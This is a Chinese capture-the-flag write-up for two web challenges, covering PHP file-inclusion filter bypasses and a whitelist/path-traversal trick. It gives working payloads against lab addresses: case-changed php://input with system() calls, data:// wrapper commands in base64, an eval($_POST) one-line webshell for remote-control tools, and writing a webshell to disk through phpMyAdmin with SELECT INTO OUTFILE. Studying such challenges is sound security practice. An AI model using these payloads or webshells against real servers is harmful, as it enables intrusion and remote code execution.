Web_php_include

考点:考审计php代码的基本能力,以及绕开的能力
知识点:
1.两个函数
①str_replace(“php://”, “”, $page);替换函数

②strstr($page, “php://”)查找函数,即输出在一个字符串里面第一次出现的位置(且对大小写敏感)即绕开了
php://input功能应用 (接受请求的get或者post数据)
2.data协议的用法
3.数据库写马的方法

题目:

方法一:
利用strstr()的敏感大小进行绕过
代码

//get中
http://220.249.52.133:32881/?page=PHP://input
//post请求中## 标题
<?php system("ls"); ?>
<?php system("cat 路径的文件名"); ?>//即利用cat命令获取

方法二:
data://伪协议执行命令利用进行绕过
使用方法:data://text/plain;base64,xxxx(base64编码后的数据)

<?php system("dir")?> base64编码后使用进行
http://111.198.29.45:47062/?page=data://text/plain/;base64,PD9waHAgc3lzdGVtKCJkaXIisssKT8%2b  (注意编码后的+号要URL编码)

方法三:
data://伪协议传木马

<?php eval($_POST[xiaohua]); ?> base64加密后拼接http://111.198.29.45:47062/?page=data://text/plain/;base64,PD9waHAgZXZhbCgkX1BPU1RbeGlhb2h1YV0pOyA/Pg==//菜刀连接即可

方法四:
数据库写入马,利用数据库进行

//御剑扫描获得phpmyadmin root 密码空 进入//数据库执行这条命令查看secure_file_priv是否为空,为空则可以写数据 如果是null不能写SHOW VARIABLES LIKE "secure_file_priv"linux默认tmp是可写目录 试试写入一句话马 菜刀连接 SELECT "<?php eval(@$_POST['xiaohua']); ?>"
INTO OUTFILE '/tmp/test1.php'

思路:①绕过代码审计中的替换即读取数据的命令
②在post中利用php的命令执行语句进行爆出flag

warmup

考点:

  1. 考php代码审计与构造的能力
  2. 考php路径访问的能力
  3. 参数与url中常见的符号理解
    知识点:
    1.#include文件包含的定义的漏洞使用类
    作用:包含并运行指定的文件
    运行方法:先按照参数的路径进行寻找,没有的话在依次删除路径
    file的参数这个是#include里面的定义为文件=路径;(且文件打开还可以考虑用php://input)
    2.函数
    ①in_array($page, $whitelist)即在whitelist中是否存在page这个参数
    ②mb_substr()函数的理解
mb_substr($page,0,mb_strpos($page . '?', '?'));//即参数从0开始返回mb_strpos这么多的字节

③mb_strpos():返回要查找的字符串在别一个字符串中首次出现的位置(即返回的位置,strstr返回的是值且是从当时开始的值)

<?php
$str = 'http://www.feiniaomy.com';
echo mb_strpos($str,'niao');
?>
//输出结果:14;

④参数的理解
如?file=source.php?(payload)//即参数$page实际为source.php?

做题:

审计代码后发现只有当 p a g e 的 参 数 构 造 存 在 于 page的参数构造存在于 page的参数构造存在于whitelist数组中存在时,才返回 true,否则都是flase
因此可以利用第二个判断机制构造 p a g e = s o u r c e . p h p ? 或 者 page=source.php?或者 page=source.php?或者page=hint.php

然后又利用#include的实际执行方法进行构造路径
为?file=source.php?/…/…/…/…/…/…/ffffllllaaaagggg
成功获取到flag

记录攻防世界web进阶相关推荐

  1. 攻防世界web进阶区Web_python_block_chain详解

    攻防世界web进阶区Web_python_block_chain详解 题目 详解 51% 双花攻击 题目 详解 我们整理一下 Announcement: The server has been res ...

  2. 攻防世界web进阶区Web_php_wrong_nginx_config详解

    攻防世界web进阶区Web_php_wrong_nginx_config详解 题目 详解 题目 打开发现无论我们输入什么他都会弹出网站建设不完全 那么我们使用御剑进行扫描,扫描到了admin和robo ...

  3. 攻防世界WEB进阶之ics-05

    攻防世界WEB进阶之ics-05 1.描述 2.实操 3.答案 1.描述 难度系数: 3星 题目来源: XCTF 4th-CyberEarth 题目描述:其他破坏者会利用工控云管理系统设备维护中心的后 ...

  4. 攻防世界web进阶区ics-05详解

    攻防世界web进阶区ics-05详解 题目 解法 preg_replace ctype_alnum strpos X-Forwarded-For 题目 我们只能点击一个地方 解法 御剑扫描有一个css ...

  5. 攻防世界-WEB进阶-ics-06(Burpsuite爆破使用)

    前言 题目来源:攻防世界-WEB进阶----ics-06 使用工具:Burpsuite 题目 云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下入侵者的痕迹 分析 这里只有报表 ...

  6. 攻防世界WEB进阶之upload

    攻防世界WEB进阶之upload 第一步:分析 第二步:实操 第三步:答案 第一步:分析 难度系数: 1星 题目来源: RCTF-2015 题目描述:暂无 脑洞很大的一题,首先题目什么都没给出,进入场 ...

  7. 攻防世界WEB进阶之upload1

    攻防世界WEB进阶之upload1 一.分析 二.实操 三.答案 难度系数: 1星 题目来源: 暂无 题目描述:暂无 题目场景: 略 题目附件: 暂无 一.分析 首先打开场景,上传文件进行抓包操作,发 ...

  8. 攻防世界WEB进阶之Cat

    攻防世界WEB进阶之Cat 第一步:分析 第二步:实操 第三步:答案 第一步:分析 难度系数: 2星 题目来源: XCTF 4th-WHCTF-2017 题目描述:抓住那只猫 首先题给出的信息抓住那只 ...

  9. 攻防世界web进阶区wtf.sh-150详解

    攻防世界web进阶区wtf.sh-150详解 题目 详解 题目 看起来像一个论坛,可以注册,登录 详解 我们随便打开一个 尝试注入 并没有发现可以注入 注册发现,admin已经存在, 我们看看能不能二 ...

最新文章

  1. 近期活动盘点:数据化思维困局和0.01突破讲座、极简大数据决策,培养数据化思维讲座...
  2. oracle limsize,Oracle9i AIX上单进程占用内存过多问题
  3. VTK:PolyData之GetMiscPointData
  4. juqery代码优化
  5. 【专场】揭秘端到端视频技术
  6. layui列表筛选列_Shopify搜索产品并筛选产品列表功能介绍
  7. Hbuilder开发app实战-识岁06-face++的js实现【完结】
  8. Vue (响应式原理-模拟-0)
  9. ETL学习总结(1)——ETL 十大功能特性详解
  10. 新浪API, 利用get_uid获取是uid的数据溢出问题解决方案
  11. 融完5亿美元创始人出局?腾讯投资的明星无人车公司Zoox地震了
  12. 立即更新 Chrome 浏览器!这个 0day 已遭在野利用
  13. CentOS minimal 版安装图形界面的步骤分享,中文语言包
  14. yolov3从头实现(六)损失计算
  15. log4j和web.xml配置webAppRootKey 的问题(一个tomcat下部署多个应用)
  16. php酒店系统论文,基于PHP的酒店管理系统PHP1008(毕业设计+论文)
  17. 访问控制基础(DAC,MAC,RBAC,ABAC,BLP)
  18. 入侵提权过程中猜解linux路径与windows路径,网站路径暴力
  19. 谷歌VAD静音检测py-webrtcvad使用详解
  20. 软件实施:别把我想简单了

热门文章

  1. JQuery引入例子
  2. 数字城市智能巡查系统软件测试
  3. Eclipse编辑窗口放大缩小的快捷键
  4. 电脑中不小心删除的重要汇报PPT文件如何快速恢复?
  5. Cannot find class in classpath TestNG 测试案例报错 kaki的博客
  6. windows net use 把共享目录映射为本地磁盘
  7. mock.js学习记录
  8. Windows 安装 Podman
  9. 食品级硅油行业研究及十四五规划分析报告
  10. Flink: CEP详解